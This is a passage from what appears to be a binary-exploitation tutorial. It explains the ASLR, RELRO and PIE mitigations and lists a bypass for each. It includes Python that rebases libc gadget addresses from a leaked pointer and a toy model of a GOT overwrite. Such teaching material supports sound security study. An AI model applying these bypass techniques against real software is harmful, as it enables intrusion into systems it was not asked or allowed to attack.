$ whoami
danilo
$ 

Very nice! We managed to hijack the control flow and get a shell using only libc gadgets.

ASLR

Address Space Layout Randomization, or ASLR for short, kills the technique used in the previous section. As the name implies, it randomizes the address space layout: each time you run the program, the stack and heap are at different addresses, and libc (and every other shared library) is loaded at a different random address.

This kills our previous approach, since we relied on libc gadgets (and now we don’t know where they are) and on knowing the stack address (which will be different on every execution).

Or does it?

Bypassing ASLR?

There are two main ways to bypass ASLR. The first is leaking a libc address. If the address of a single libc function is leaked, we can compute libc’s base address and, from it, where all the gadgets are! However, that would depend on a second vulnerability to leak the address. This is not unusual, but it will not happen in our silly example.
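The leak arithmetic itself is simple: offsets inside libc don’t change between runs, only the base does. Here is a minimal sketch using this post’s own numbers. It assumes that the libc base ldd reports with ASLR off (0x00007ffff79e2000, shown in the RELRO section) is the same base gdb saw, and the leaked value is hypothetical, chosen to match one of the ASLR-enabled ldd runs:

```python
# Values from this post, all taken with ASLR disabled:
LIBC_BASE_NOASLR = 0x00007ffff79e2000  # libc base reported by ldd
EXECVE_NOASLR = 0x00007ffff7ac6c00     # "disass execve" in gdb
POP_RDI_NOASLR = 0x00007ffff7a035bf    # peda ropsearch

# Offsets inside libc do not change between runs; only the base does.
EXECVE_OFF = EXECVE_NOASLR - LIBC_BASE_NOASLR
POP_RDI_OFF = POP_RDI_NOASLR - LIBC_BASE_NOASLR


def rebase_from_leak(leaked_execve):
    """Given a leaked runtime address of execve, return (libc base, pop rdi; ret)."""
    base = leaked_execve - EXECVE_OFF
    if base & 0xFFF:
        # Libraries are mapped at page granularity, so a correct base ends in 000.
        raise ValueError("base is not page-aligned: wrong leak or wrong offset?")
    return base, base + POP_RDI_OFF


# Hypothetical leak from a run where libc landed at 0x7f5016311000.
base, pop_rdi = rebase_from_leak(0x7f50163f5c00)
print(hex(EXECVE_OFF), hex(base), hex(pop_rdi))
```

The page-alignment check is a cheap way to catch a wrong offset: a bad guess almost never produces a base ending in 000.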

The other relies on reusing only the program’s own code. For a non-PIE binary such as ours, the .text section is not randomized by ASLR, so the entire program is available for gadgets. Our silly example is very small, though, so we won’t find many useful gadgets there.

It’s a shame that we will not demonstrate an ASLR bypass in this post. However, I’ll make room for one in the future. (Actually, I have been writing one for a while now and it should be out soon.)

RELRO

Before talking about RELRO, a word or two must be said about the Procedure Linkage Table (PLT) and the Global Offset Table (GOT). Our program calls the libc functions “printf” and “gets”. If ASLR is disabled, libc (and therefore these functions) is always loaded at the same address, as the ldd program shows:

└────╼ ldd test
	linux-vdso.so.1 (0x00007ffff7ffa000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff79e2000)
	/lib64/ld-linux-x86-64.so.2 (0x00007ffff7dd3000)
└────╼ ldd test
	linux-vdso.so.1 (0x00007ffff7ffa000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff79e2000)
	/lib64/ld-linux-x86-64.so.2 (0x00007ffff7dd3000)
└────╼ ldd test
	linux-vdso.so.1 (0x00007ffff7ffa000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff79e2000)
	/lib64/ld-linux-x86-64.so.2 (0x00007ffff7dd3000)

Note that libc addresses remain the same on every execution. However, look what happens when ASLR is enabled:

└────╼ ldd test
	linux-vdso.so.1 (0x00007ffe4ed82000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f5016311000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f5016702000)
└────╼ ldd test
	linux-vdso.so.1 (0x00007ffe621a3000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fc0abf36000)
	/lib64/ld-linux-x86-64.so.2 (0x00007fc0ac327000)
└────╼ ldd test
	linux-vdso.so.1 (0x00007ffe377ac000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f1ec5854000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f1ec5c45000)

The addresses are different every time! Libc is loaded dynamically at runtime. This makes the program smaller and makes libc updates easier, since the program does not have to be recompiled on every libc update. But when printf or gets is called, how does the program know which address to call?

Well, PLT and GOT are the two answers. When the program calls a function - such as printf - it will not call libc’s function directly. Instead, it will call a wrapper in the PLT:

gdb-peda$ disass main
Dump of assembler code for function main:
...
   0x000000000040055b <+46>:	call   0x4003f0 <printf@plt>
...

Let’s see what’s up in 0x4003f0 address:

gdb-peda$ disass 0x4003f0
Dump of assembler code for function printf@plt:
   0x00000000004003f0 <+0>:	jmp    QWORD PTR [rip+0x2005aa]        # 0x6009a0
   0x00000000004003f6 <+6>:	push   0x0
   0x00000000004003fb <+11>:	jmp    0x4003e0
End of assembler dump.

If we disassemble 0x6009a0, we land in the GOT:

gdb-peda$ disass 0x6009a0
Dump of assembler code for function _GLOBAL_OFFSET_TABLE_:
   0x0000000000600988:	test   al,0x7
   0x000000000060098a:	(bad)  
   0x000000000060098b:	add    BYTE PTR [rax],al
   0x000000000060098d:	add    BYTE PTR [rax],al
   0x000000000060098f:	add    BYTE PTR [rax+0x31],dh
   0x0000000000600992:	xor    al,0x24
   0x0000000000600994:	in     al,0x7f
   0x0000000000600996:	add    BYTE PTR [rax],al
   0x0000000000600998:	rex clc 
   0x000000000060099a:	adc    ah,BYTE PTR [rsp+riz*8]
   0x000000000060099d:	jg     0x60099f
   0x000000000060099f:	add    BYTE PTR [rax-0x41],dh
   0x00000000006009a2:	fsub   DWORD PTR [rbx]
   0x00000000006009a4:	in     al,0x7f
   0x00000000006009a6:	add    BYTE PTR [rax],al
   0x00000000006009a8:	nop
   0x00000000006009a9:	jno    0x600985
   0x00000000006009ab:	and    esp,esp
   0x00000000006009ad:	jg     0x6009af
   0x00000000006009af:	add    BYTE PTR [rax],al
End of assembler dump.

So what the hell is that?

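Since the address of printf is not known when the program is built, the linker generates a small stub in a section called the PLT, placed just before .text. The stub jumps through an entry in the GOT, another memory region. The GOT holds data (addresses), not code, which is why the disassembly above is gibberish; x/gx 0x6009a0 would show the 8-byte pointer stored there. That’s where things get interesting.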

The first time printf is called, its GOT entry does not yet point into libc: it points back into the PLT stub (the push 0x0; jmp 0x4003e0 part), which hands control to the dynamic linker’s resolver. The resolver finds printf in libc (this lazy lookup is part of dynamic linking), writes its address into the GOT entry, and jumps to it. The next time printf is called, the GOT already holds the right address, so the PLT stub jumps straight into libc.

A possible attack is to overwrite the GOT entry for printf (the PLT stub itself lives in read-only code) so that it points somewhere malicious; the next call to printf then goes there instead. This can be achieved through an overflow or an arbitrary write, for instance.

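When RELRO (Relocation Read-Only) is fully enabled, the dynamic linker resolves every imported function before main runs and then marks the GOT read-only, making the aforementioned attack impossible. Partial RELRO, on the other hand, leaves the GOT entries used by the PLT writable. The price of full RELRO is the startup overhead of populating the entire GOT before the main function gets executed.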
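To make the lazy-binding dance, and what full RELRO changes, a bit more concrete, here is a toy Python model. It is nothing like how ld.so is actually implemented: Python callables stand in for libc functions (the LIBC dict and ToyProcess class are made up for illustration), and a read-only mappingproxy stands in for the GOT being made read-only. It only mirrors the control flow described above:

```python
from types import MappingProxyType

# Stand-ins for libc functions (hypothetical, for illustration only).
LIBC = {
    "printf": lambda s: f"printf({s!r})",
    "gets": lambda: "gets()",
}


class ToyProcess:
    def __init__(self, imports, full_relro=False):
        self.resolver_calls = 0
        if full_relro:
            # Full RELRO: resolve everything before "main", then make the GOT read-only.
            self.got = MappingProxyType({name: LIBC[name] for name in imports})
        else:
            # Lazy binding: each GOT slot starts out pointing at the resolver path.
            self.got = {name: self._resolver_for(name) for name in imports}

    def _resolver_for(self, name):
        def resolve(*args):
            self.resolver_calls += 1
            self.got[name] = LIBC[name]  # patch the GOT slot with the real "address"
            return LIBC[name](*args)
        return resolve

    def call_plt(self, name, *args):
        # A PLT stub is essentially "jmp *GOT[name]".
        return self.got[name](*args)


lazy = ToyProcess(["printf", "gets"])
lazy.call_plt("printf", "hi")
lazy.call_plt("printf", "again")
print(lazy.resolver_calls)  # 1: only the first call went through the resolver

# GOT overwrite: with a writable GOT, the next printf call goes wherever we want.
lazy.got["printf"] = lambda s: "hijacked!"
print(lazy.call_plt("printf", "hi"))  # hijacked!

relro = ToyProcess(["printf", "gets"], full_relro=True)
try:
    relro.got["printf"] = lambda s: "hijacked!"
except TypeError:
    print("GOT is read-only")
```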

There’s no bypass to this mitigation that I know of. Except, of course, for using a different approach.

PIE

Position Independent Executable (PIE) adds an extra layer of protection that makes return-oriented programming much harder. We have seen that ASLR randomizes the stack, heap and libraries, but an adversary may still use the program’s .text section for gadgets. A PIE binary can be loaded at any address, so with ASLR enabled its own code and data are randomized too. The cost is some performance overhead, most noticeable on 32-bit x86; on x86-64, RIP-relative addressing keeps it small.

To bypass this mitigation, one must leak an address from the binary, compute its load base and compensate.

Conclusion

Let’s do a TL;DR here:

Stack canary

A semi-random 8-byte value placed before the return address, so that overwriting the return address through a stack buffer overflow is detected.

Pros: very effective against stack buffer overflow. The performance overhead is minimal.

Cons: Does not protect against other memory corruption vulnerabilities.

Bypass: Leak the canary.

NX

Prevents some regions of memory (such as the stack and heap) from being executed. With this mitigation, an adversary is unable to inject new code into the program and has to resort to a code-reuse attack.

Pros: makes it impossible to add new code to the program. Prevents dangerous and unnecessary regions from being executed. The performance overhead is minimal.

Cons: does not offer much protection, as ret2libc is a fairly easy bypass.

Bypass: ret2libc, return oriented programming.

ASLR

Randomizes a few regions of the memory, such as stack, heap and libs.

Pros: effective at mitigating ret2libc attacks. It has some performance overhead, but it’s not an issue.

Cons: does not prevent an adversary from using gadgets within a non-PIE program.

Bypass: gadgets in the program and address leak.

RELRO

Constructs the GOT before the main function is called and makes it unwritable.

Pros: kills attacks that rely on overwriting the GOT.

Cons: other attacks are still possible. There’s a performance overhead.

Bypass: none. Perhaps use another approach?

PIE

Lets ASLR randomize the program’s own code and data too, so the entire virtual address space is randomized.

Pros: very effective against code-reuse attacks (such as return oriented programming).

Cons: some performance overhead, most noticeable on 32-bit x86.

Bypass: address leak.